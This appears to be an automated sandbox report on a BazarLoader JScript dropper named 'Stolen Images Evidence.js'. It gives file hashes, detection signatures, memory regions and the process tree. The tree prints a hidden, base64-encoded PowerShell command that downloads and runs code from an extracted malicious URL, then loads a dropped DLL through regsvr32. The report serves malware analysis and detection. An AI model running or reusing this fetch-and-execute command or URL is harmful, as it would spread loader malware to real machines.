Overview

overview

10

Static

static

Stolen Ima...nce.js

windows10_x64

10

Stolen Ima...nce.js

windows10_x64

10

Resubmissions

07-10-2021 22:07

211007-116dhsdbek 10

07-10-2021 21:50

211007-1p5b3schd7 10

Analysis

  • max time kernel
    13s
  • max time network
    6s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    07-10-2021 22:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Stolen Images Evidence.js

  • Size

    18KB

  • MD5

    72217c4045c79d272f61a11845b6b660

  • SHA1

    19d37ee5bf8cf53fcf6c24a5d2635a3c4dbb1a81

  • SHA256

    4540b8ddc48ded9be70cbefdd11a5c2f3745f684adac2d7a3ca5976cb811104d

  • SHA512

    250ffe4fd5ff60206fc39a225ad8318ae206fb883ed8246180b2a867f75b67dabfff5eed4f29e7c9a1396b6874906132dbd7ad13976b55e2c5769d359be27823

Score
10/10
bazarloaderdropperloader

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://mopuketo.space/333g100/index.php

Signatures

  • Bazar Loader

    Detected loader normally used to deploy BazarBackdoor malware.

    loaderdropperbazarloader
  • Bazar/Team9 Loader payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2344
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHAAdQBrAGUAdABvAC4AcwBwAGEAYwBlAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHAAdQBrAGUAdABvAC4AcwBwAGEAYwBlAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4024
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\UejIp.dat
          4⤵
          • Loads dropped DLL
          PID:3988
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\regsvr32.exe,DllRegisterServer {5E1FF564-9B1F-4183-8C7D-22AB1144F480}
    1⤵
      PID:1900

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\UejIp.dat
      MD5

      1526cf48bd2ec8a722dfeb53581c3d1d

      SHA1

      5e0a4babc60f4fea0f66baea8d2356405a7f8bdf

      SHA256

      f7450ce760512cd1ccbac1c9943abdfd93c151c7b53cdb52ef0b917a48844faa

      SHA512

      d0b6bc627c0e196d17ba110561c2a0a94f3634775b6189ea9c9d81267d41bf5f6072bbe34ffc21b48acd86fa110992dd83405cc2fd431f6f561ea74275dd0f91

      Download Submit

    • \Users\Admin\AppData\Local\Temp\UejIp.dat
      MD5

      1526cf48bd2ec8a722dfeb53581c3d1d

      SHA1

      5e0a4babc60f4fea0f66baea8d2356405a7f8bdf

      SHA256

      f7450ce760512cd1ccbac1c9943abdfd93c151c7b53cdb52ef0b917a48844faa

      SHA512

      d0b6bc627c0e196d17ba110561c2a0a94f3634775b6189ea9c9d81267d41bf5f6072bbe34ffc21b48acd86fa110992dd83405cc2fd431f6f561ea74275dd0f91

      Download Submit

    • memory/3988-137-0x0000000000000000-mapping.dmp

      Download

    • memory/3988-141-0x00000000007C0000-0x00000000007E8000-memory.dmp

      Filesize

      160KB

      Download

    • memory/4024-126-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-129-0x000001C6B76A0000-0x000001C6B76A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4024-121-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-122-0x000001C69D380000-0x000001C69D381000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4024-123-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-125-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-116-0x0000000000000000-mapping.dmp

      Download

    • memory/4024-127-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-128-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-120-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-130-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-134-0x000001C69D420000-0x000001C69D422000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-135-0x000001C69D423000-0x000001C69D425000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-136-0x000001C69D426000-0x000001C69D428000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-119-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-138-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-117-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4024-118-0x000001C69B580000-0x000001C69B582000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4080-115-0x0000000000000000-mapping.dmp

      Download